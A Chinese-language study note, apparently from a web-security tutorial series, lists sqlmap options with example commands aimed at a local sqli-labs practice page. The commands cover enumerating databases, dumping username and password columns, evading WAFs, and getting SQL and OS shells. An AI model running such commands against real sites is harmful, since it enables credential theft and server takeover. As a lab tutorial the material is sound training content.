某教程學習筆記（一）：12、sqlmap使用介紹

床頭的插座連著充電器，充電器連著手機，手機連著耳機，耳機連著我，這樣的我，好像一個輸液的病人。。。

---- 網易雲熱評

一、環境：kali 2020.01，python2或python3

二、命令介紹

1、sqlmap --update 更新命令

2、is-dba 查詢是否是管理員權限

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --is-dba

3、dbs 獲取所有數據庫名稱

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --dbs

4、current-db 獲取當前數據庫名稱

5、users 獲取所有數據庫用戶

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --users

6、current-users 獲取當前數據庫用戶

7、tables 獲取所有表的信息

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --tables -D security

8、columns 獲取所有列的信息

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --columns -T users -D security

9、dump 獲取字段內容

10、--level 指定掃描等級

11、D 指定數據庫

12、T 指定表

13、C 指定列

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --dump -C "username,password" -T users -D security

14、dbms=mysql 指定數據庫

15、v 顯示調試信息

16、risk 顯示風險等級

17、u 獲取目標

18、m c:\\1.txt 從文件總獲取多個目標探測

19、data="id=1" post方式注入

20、data="su=123$id=456" --param0del="$" 分割參數

21、cookie cookie注入

22、referer 偽造http請求中的referer

23、headers 偽造http請求中的頭部

24、proxy 添加代理，http://url:port

25、delay 設置兩個請求間的延遲

26、timeout 設定請求超時時間

27、retries 設定重現鏈接次數

28、safe-url 提供一個連接，每隔一段時間就會去訪問一下

29、safe-freq 提供一個連接，每次請求之後都會去訪問一下

30、p "io=123" 指定參數進行探測注入

31、prefix 閉合語句的前面

32、suffix 閉合語句的後面

33、technique 指定探測方式

34、B:布爾型注入，E:報錯型注入，U:聯合查詢注入，S:多語句查詢注入，T:時間延遲注入

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --technique=U

35、union-cols 指定聯合查詢的字段數

36、union-char 指定聯合查詢用到的字符

37、second-order 二階注入後面跟跳轉網址

38、search用來尋找特定的數據庫名、表名、列名

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --search -T users

39、t "c:\\1.txt" 把請求與相應的日誌保存起來

40、batch 全自動按默認操作

41、charset=GBk 指定字符編碼

42、flush-session 清空之前的session重新測試

43、hex 使用hex函數避免編碼問題

44、smart 快速注入

45、mobile 設置成手機UA

45、identify-waf 監測用的什麼waf

46、check-waf 監測是否存在waf

47、common-tables -D text 暴力破解表名(access)

48、common-columns -D text -T ttt 暴力破解列名

49、tamper base64encode.py base64編碼注入

50、sql-query="select version()" 執行sql語句

51、sql-shell 直接獲取sql語句執行權限

sqlmap -u "http://192.168.21.135/sqli/Less-1/index.php?id=1" --sql-shell

52、file-read 讀取文件

53、file-write 本地路勁 file-dest 上傳文件

54、os-shell 獲取shell權限

55、schema --exclude-sysdbs 列出除系統以外的數據庫

禁止非法，後果自負

閱讀更多 web安全工具庫 的文章

關鍵字: 學習 2019科技之光 數據庫